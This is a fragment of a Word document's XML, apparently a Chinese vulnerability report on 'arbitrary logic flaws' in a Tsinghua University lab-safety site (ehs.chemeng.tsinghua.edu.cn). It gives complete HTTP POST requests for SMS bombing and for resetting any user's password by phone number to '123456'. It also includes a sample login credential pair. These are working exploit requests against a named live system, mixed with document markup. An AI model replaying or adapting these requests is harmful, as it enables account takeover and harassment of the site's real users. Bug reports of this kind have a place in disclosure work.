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0F97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36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD407B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>清华大学任意逻辑缺陷打包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877F710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短信轰炸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+ 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任意用户密码重置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DE72C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任意用户密码重置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA4BF7" w14:textId="586A58A6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6389AA68" wp14:editId="6DFE8612">
            <wp:extent cx="5274310" cy="2783205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3" name="图片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196C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然后使用用户名登录即可成功，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021059/123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A92424" w14:textId="61E0F915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335B35D1" wp14:editId="74364AD0">
            <wp:extent cx="5274310" cy="2243455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="2" name="图片 2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661A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短信轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F45B1EF" w14:textId="0FB2A8D0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D2C6B31" wp14:editId="37AD556B">
            <wp:extent cx="4090670" cy="8863330"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1" name="图片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0A66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短信轰炸数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843BD1A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POST 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lsms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/register/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sendPasswordCode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HTTP/1.1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Host: ehs.chemeng.tsinghua.edu.cn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Content-Length: 34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Accept: application/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json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, text/plain, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD407B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/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roleId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: null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locale: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zh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-CN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Authorization: undefined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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)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AppleWebKit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/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36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Edg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/109.0.1518.61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Content-Type: application/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json;charset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=UTF-8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Origin: http://ehs.chemeng.tsinghua.edu.cn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Referer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: http://ehs.chemeng.tsinghua.edu.cn/lsms/getPassword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Accept-Encoding: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gzip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, deflate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Accept-Language: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zh-CN,zh;q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=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6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Cookie: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serverid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=1325456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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA6450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{"code":"1","phone":"19904457834"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7310D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任意用户密码重置数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1166FC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POST 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lsms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/register/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changePassword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HTTP/1.1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Host: ehs.chemeng.tsinghua.edu.cn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Content-Length: 63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Accept: application/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json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, text/plain, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD407B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/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roleId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: null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locale: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zh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-CN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Authorization: undefined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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)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AppleWebKit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/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36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Edg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/109.0.1518.61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Content-Type: application/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json;charset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=UTF-8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Origin: http://ehs.chemeng.tsinghua.edu.cn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Referer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: http://ehs.chemeng.tsinghua.edu.cn/lsms/getPassword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Accept-Encoding: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gzip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, deflate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Accept-Language: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zh-CN,zh;q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=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6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 xml:space="preserve">Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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serverid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=1325456</w:t>
      </w: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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8B248" w14:textId="77777777" w:rsidR="00FD407B" w:rsidRPr="00FD407B" w:rsidRDefault="00FD407B" w:rsidP="00FD40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D407B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{"password":"123456","passwordVerify":"123456","phone":"19904457834"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFC1F0" w14:textId="77777777" w:rsidR="00540E73" w:rsidRDefault="00540E73"/>
    <w:sectPr w:rsidR="00540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3"/>
    <w:rsid w:val="00540E73"/>
    <w:rsid w:val="00EF4593"/>
    <w:rsid w:val="00FD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413CB-BF79-4FB7-B4C1-444AFCAD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4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0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4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D4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寒蝉</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Master 寒蝉</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-28T14:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-28T14:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>